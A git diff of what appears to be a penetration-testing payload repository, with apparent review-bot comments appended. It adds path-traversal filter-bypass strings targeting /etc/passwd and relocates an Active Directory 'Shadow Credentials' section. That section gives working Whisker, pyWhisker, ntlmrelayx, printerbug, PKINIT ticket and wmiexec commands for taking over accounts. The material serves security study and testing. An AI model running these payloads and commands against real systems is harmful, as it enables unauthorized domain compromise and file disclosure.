diff --git a/.github/hopla_config.json b/.github/hopla_config.json index 89360ff..7de4b8c 100644 --- a/.github/hopla_config.json +++ b/.github/hopla_config.json @@ -315,6 +315,14 @@ "name": "Filter Bypass 2", "value": "..///////..////..//////etc/passwd" }, + { + "name": "Filter Bypass 3", + "value": "...//...//etc/passwd" + }, + { + "name": "Filter Bypass 4", + "value": "%252f..%252f..%252f..%252f..%252fetc/passwd" + }, { "name": "Filter Bypass 3", "value": "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd" diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index a7c3d4c..0d3473c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -58,7 +58,6 @@ - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) - [Kerberoasting](#kerberoasting) - [KRB_AS_REP Roasting](#krbasrep-roasting) - - [Shadow Credentials](#shadow-credentials) - [Pass-the-Hash](#pass-the-hash) - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) - [Using impacket](#using-impacket) @@ -85,6 +84,7 @@ - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) - [Pass-The-Certificate](#pass-the-certificate) + - [Shadow Credentials](#shadow-credentials) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing DNS Admins Group](#abusing-dns-admins-group) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) 
@@ -1837,68 +1837,6 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). -### Shadow Credentials - -> Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. - -:warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists - -**Requirements**: -* Domain Controller on (at least) Windows Server 2016 -* PKINIT Kerberos authentication -* An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object - -**Exploitation**: -- From Windows, use [Whisker](https://github.com/eladshamir/Whisker): - ```powershell - # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. - Whisker.exe list /target:computername$ - # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. - Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password" - Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1] - # Removes a key credential from the target object specified by a DeviceID GUID. - Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b - ``` - -- From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker): - ```bash - # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. 
- python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list" - # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. - pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list" - python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1" - # Removes a key credential from the target object specified by a DeviceID GUID. - python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e" - ``` - -**Scenario**: - -- Scenario: Shadow Credential relaying - - Trigger an NTLM authentication from `DC01` (PetitPotam) - - Relay it to `DC02` (ntlmrelayx) - - Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker) - - Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'` -- Scenario: Workstation Takeover with RBCD - ```ps1 - # Only for C2: Add Reverse Port Forward from 8081 to Team Server 81 - - # Set up ntlmrelayx to relay authentication from target workstation to DC - proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81 - - # Execute printer bug to trigger authentication from target workstation - proxychains python3 printerbug.py ez.lab/matt:Password1\!@ws2.ez.lab ws1@8081/file - - # Get a TGT using the newly acquired certificate via PKINIT - proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR - - # Get a TGS for the target account - proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v - - # Utilize the TGS for future activity 
- export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache - proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab - ``` - ### Pass-the-Hash The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. 
@@ -2594,6 +2532,71 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 ``` +### Shadow Credentials + +> Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. When trying to pre-authenticate with PKINIT, the KDC will check that the authenticating user has knowledge of the matching private key, and a TGT will be sent if there is a match. + +:warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists + +**Requirements**: +* Domain Controller on (at least) Windows Server 2016 +* Domain must have Active Directory `Certificate Services` and `Certificate Authority` configured +* PKINIT Kerberos authentication +* An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object + +**Exploitation**: +- From Windows, use [Whisker](https://github.com/eladshamir/Whisker): + ```powershell + # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. + Whisker.exe list /target:computername$ + # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. + Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password" + Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1] + # Removes a key credential from the target object specified by a DeviceID GUID. 
+ Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b + ``` + +- From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker): + ```bash + # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. + python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list" + # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. + pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list" + python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1" + # Removes a key credential from the target object specified by a DeviceID GUID. + python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e" + ``` + +**Scenario**: + +- **Scenario 1**: Shadow Credential relaying + - Trigger an NTLM authentication from `DC01` (PetitPotam) + - Relay it to `DC02` (ntlmrelayx) + - Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker) + - Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'` + +- **Scenario 2**: Workstation Takeover with RBCD + ```ps1 + # Only for C2: Add Reverse Port Forward from 8081 to Team Server 81 + + # Set up ntlmrelayx to relay authentication from target workstation to DC + proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81 + + # Execute printer bug to trigger authentication from target workstation + proxychains python3 printerbug.py ez.lab/matt:Password1\!@ws2.ez.lab ws1@8081/file + + # Get a TGT using the newly acquired certificate via PKINIT + proxychains python3 gettgtpkinit.py ez.lab/ws2\$ 
ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR + + # Get a TGS for the target account + proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v + + # Utilize the TGS for future activity + export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache + proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab + ``` + + ### Dangerous Built-in Groups Usage If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object. @@ -3863,4 +3866,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4) * [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html) * [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/) -* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) \ No newline at end of file +* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) +* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) \ No newline at end of file
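Review bot: in the `.github/hopla_config.json` hunk the first inserted entry is named "Filter Bypass 3", but the existing entry directly after the insert (the `/%5C../%5C../...` path) already carries that name, so the list now has two "Filter Bypass 3" entries and anything that keys on `name` will silently pick one of them; renumber so each name is unique, for example by keeping the inserted pair as 3 and 4 and renaming the existing `%5C` entry to "Filter Bypass 5", or by appending the new entries after the existing ones.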
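Review bot: in the added Shadow Credentials section, Scenario 2 writes the service ticket to `administrator_tgs.ccache` (the last argument of `gets4uticket.py`) but the next step runs `export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache`, so the final `wmiexec.py -k -no-pass` line points at a file no earlier step produced; use one name for both. Since the block is being moved anyway, also fix what it carries over from the old location: `/domain:constoso.local` in both Whisker lines should read `contoso.local`, the pyWhisker line directly under the "adds a new key credential" comment still says `--action "list"` and labels `-p` as `CERTIFICATE_PASSWORD` even though that flag takes the authenticating user's password, and the title "Workstation Takeover with RBCD" does not match the visible steps, which use `--shadow-credentials` and `gets4uticket.py` rather than any delegation attribute write. The new requirement bullet on AD CS also overlaps the existing "PKINIT Kerberos authentication" bullet; stating once that the DC needs a certificate usable for PKINIT (normally issued by AD CS) would be clearer.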
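Review bot: the references hunk appends the Hacker Recipes link but the file still ends with `\ No newline at end of file`, which is why the unchanged PAM-trust entry shows up as a remove/re-add pair; terminate the last line with a newline so the next reference added does not produce the same spurious modification of the previous entry.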